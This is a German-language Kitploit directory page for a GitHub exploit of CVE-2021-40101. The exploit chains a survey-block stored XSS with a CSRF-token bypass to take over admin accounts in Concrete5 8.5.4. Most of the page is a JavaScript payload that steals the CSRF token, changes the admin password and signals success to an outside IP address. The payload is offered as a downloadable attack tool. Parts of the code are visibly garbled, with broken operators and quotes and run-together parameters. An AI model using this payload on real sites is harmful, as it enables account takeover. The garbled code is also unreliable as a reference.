Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-40101 — Umfrage-XSS in Kombination mit CSRF führt zur Übernahme von Admin-Konten in Concrete5 8.5.4 | Kitploit
Tools/GitHubGitHub/s1lkys/cve-2021-40101
Phishing-ToolsSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubs1lkys/cve-2021-40101

CVE-2021-40101

Umfrage-XSS in Kombination mit CSRF führt zur Übernahme von Admin-Konten in Concrete5 8.5.4

Repository anzeigen
4vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Umfrage-XSS in Kombination mit CSRF führt zur Übernahme von Admin-Konten in Concrete5 8.5.4

Ein Administrator von Concrete CMS in Versionen vor 9 musste bei der Änderung des Passworts eines anderen Benutzers nicht sein eigenes Passwort angeben.

In Kombination mit CVE-2021-28145 ("Concrete CMS (formerly concrete5) before 8.5.5 allows remote authenticated users to conduct XSS attacks via a crafted survey block. This requires at least Editor privileges": Der Fix war in Version 8.5.5 enthalten.) ist es möglich, dass ein Benutzer mit niedrigen Berechtigungen, z. B. ein Entwickler oder ein öffentlicher Benutzer, der Umfragen erstellen kann, bösartigen JavaScript-Code in die Webanwendung einschleust. Die Ergebnisse der Umfragen können von einem Administrator in seiner Weboberfläche unter Berichte > Umfragen eingesehen werden. Der bösartige JavaScript-Code wird dort ebenfalls ausgeführt. Concrete5 verfügt über einen CSRF-Schutz, der sehr einfach umgangen werden kann, indem man das entsprechende Token von der Seite stiehlt, bevor man eine Anfrage ausführt. Da Concrete5 bei der Änderung des Kennworts nicht nach dem alten Kennwort fragt, ist es sehr einfach, das Administratorkennwort zu ändern.

Payload

root@kitploit:~
var ccm_token = ";
var body = ";
var regex = /[0-9]{10}\:[a-f0-9]{32}/g;
var req = new XMLHttpRequest();
var req2 = new XMLHttpRequest(); 
req.open("GET","/concrete5-8.5.4/index.php/dashboard/users/search/view/1", true); 
req.setRequestHeader("X-Requested-With", "XMLHttpRequest");
req.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
req. send(); 

req.onreadystatechange = function () { 
  if (req.readyState == 4 bb req.status == 200) { 
    body = req.responseText; 
    ccm_token = body.match(regex)[3];
   }
  }; 
setTimeout(() => { 
  confirm("Admin Account Takeover through XSS and CSRF Bypass in Concrete5 v.8.5.4 by Silky. CSRF Tok en: "+ccm_token); 
  req2.open("POST","/concrete5-8.5.4/index.php/dashboard/users/search/change_password/1", true);
  req2.setRequestHeader("X-Requested-With", "XMLHttpRequest");
  req2.setRequestHeader('Content-type', eapplication/x-www-form-urlencoded.);
  req2.send("ccm_token="+ccm_token+"&uPassword=Demonstration_by_SilkyEruPasswordConfirm=Demonstration_ by_Silkyt_ccm_consider_request_as_xhr=1"); 

req2.onreadystatechange = function () { 
  if (req2.readyState == 4 bb req2.status == 200) {
    body = req2.responseText;
    if (body.includes("Password updated successfully.")){
      console.log("Password updated successfully.");
      var myImage = new Image(0, 0);
      myImage.src = Ihttp://192.168.56.1:5686/Password_changed_successfullys;
     }
     else{
      console.log("Something went wrong");
     } 
   }
 } 
},2000); 

CVSS-Bewertungen:

  • CVE-2021-40101 - 6.4 medium AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
  • CVE-2021-28145 - 5.4 medium CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Daraus ergibt sich eine endgültige Bewertung von

  • 7.2 hoch

Referenzen:

  • https://hackerone.com/bugs?report_id=1065577
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40101
  • https://youtu.be/w-B-j4NadDw
  • https://github.com/concrete5/concrete5/pull/9707/commits/f6bb806acfdda22860133b9586df068d4e3909a7
Tool herunterladen